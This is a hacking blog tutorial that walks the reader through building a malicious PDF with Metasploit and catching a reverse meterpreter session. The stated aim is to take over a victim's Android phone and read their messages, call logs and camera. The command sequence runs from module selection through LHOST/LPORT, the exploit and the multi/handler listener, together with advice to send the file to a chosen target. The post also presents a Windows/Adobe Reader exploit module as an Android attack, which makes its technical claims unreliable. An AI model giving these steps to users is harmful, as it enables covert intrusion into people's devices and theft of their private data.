How to Hack Android phone by PDF File using Metasploit Framework

How to Hack Android phone by PDF File using Metasploit Framework

Published by Tech4use on February 3, 2020

After receiving lot of praise and appreciation on our last post on Android to Android Hacking via Metasploit. We now gonna post a series of Hacking tools and techniques with working method and full description. This post is about Hacking android using Metasploit with PDF File. It works both on Android(via Termux) or any Desktop.

 

Requirements :-

1. Termux app( Download it from Play Store).

2. Install Metasploit Framework in TermuX (Read Part #1 of this post to install Metasploit-Framework in just 4 simple steps).

3. TermuX should be allowed to use External Storage (For this enter the command : “termux-setup-storage”).

4. (Recommended not necessary) Use Hacker`s Keyboard for entering commands in TermuX easily.

 

Once you have completed all requirements we are ready to perform the hack.

Hacking Android Using Metasploit via a PDF File :-

Step 1 :- Launch Metasploit Console

First of all open Termux, if you are on android or just open your terminal if on Desktop.

Enter the following command to open Metasploit Console

msfconsole

If this kind of screen appears in front of you then we are good and if not there might be problem in installation of metasploit.

metasploit

 

Step 2 :- Creating the Evil PDF (Payload)

Type the commands given below or simply copy paste them one by one to create the PDF File.

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Then you have to set your Localhost. For this you will need your IP Address, to check your IP Address type

ifconfig

in new seesion on termux or in another terminal window. Now come to your metasploit console and set your Localhost like this –

set LHOST 192.168.0.0

Replace the IP Address given in above command by your own IP Address

Now its time to setup port for this enter this command –

set LPORT 4444

You are free to use any port you want like 4564, 8080 etc.

Now its time to generate the Evil PDF File do this by below command –

set filename MyDocument.pdf

Here, you are also free to use any name you want just put it in place of MyDocument but be sure to put .pdf at the end of its name.

 

Now the last command is for final creation of file do this by typing this command –

exploit

metasploit android

Now within a second a message will be displayed saying that your PDF File is created at any default location. First copy that PDF File to your either Internal or External storage like this

mv <fille_location> <new_location>

And now you are done with creation part. Send it to any person that you want to hack. As soon as he/she will open that pdf file you will get the metasploit session.

Step 3 :- Exploitation

First open your metasploit console by typing

msfconsole

and then start writing below mentioned command –

use exploit/multi/handler/

set LHOST <your_IP>

set LPORT 4444

exploit

 

android hack

Note – Make sure to enter same IP and Port as you entered above in Step 2.

It will some time and then BOOM you will get meterpreter session. If such output appears then you got access to victim’s phone.

 

For seeing his/her sms, call logs, taking picture from victim’s camera you can use command given on the post about How to Hack an Android Phone with another Android (Without Root) : Android to Android Hacking(Part #2) in the last section.

 

 

Note – This is only for educational purpose and I’m not responsible for any misuse or harm done.

If you need any help then feel free to ask me in comment.

Thanks for coming if you like it then please share it, you will be appreciated.😄

 

Powered by NooB HackeR RaJ && thanks to my group for information about this ✌️